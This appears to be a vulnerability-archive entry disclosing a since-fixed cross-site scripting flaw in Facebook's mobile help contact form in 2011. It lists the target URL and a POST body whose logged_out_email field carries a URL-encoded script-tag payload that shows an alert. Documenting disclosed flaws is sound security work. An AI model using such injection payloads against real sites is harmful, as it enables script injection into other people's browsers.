Security researcher Yeyah, has submitted on 27/01/2011 a cross-site-scripting (XSS) vulnerability affecting m.facebook.com, which at the time of submission ranked 2 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 28/01/2011. It is currently fixed. |
Date submitted: 27/01/2011 |
Date published: 28/01/2011 |
Date fixed: 15/04/2011 | Status: FIXED |
Author: Yeyah |
Domain: m.facebook.com |
Category: XSS |
Pagerank: 2 |
URL: http://m.facebook.com/help/contact.php?submit&show_form=wap_login_problems&cant_identify=1&refid=0 |
POST: lsd=WbNVg&post_form_id=923d55ac0d8c47f6a0a69fa412b56d12&lsd=WbNVg&logged_out_email=%22%3E%3Cscript%3 Ealert%28%2FXSS%2F.source%29%3C%2Fscript%3E&fullname=&birth_day=-1&birth_month=-1&birth_year=-1&carr ier=&country=&phone_number=&phone_model=&description=&submit=Envoyer |
Click here to view the mirror
|
|
|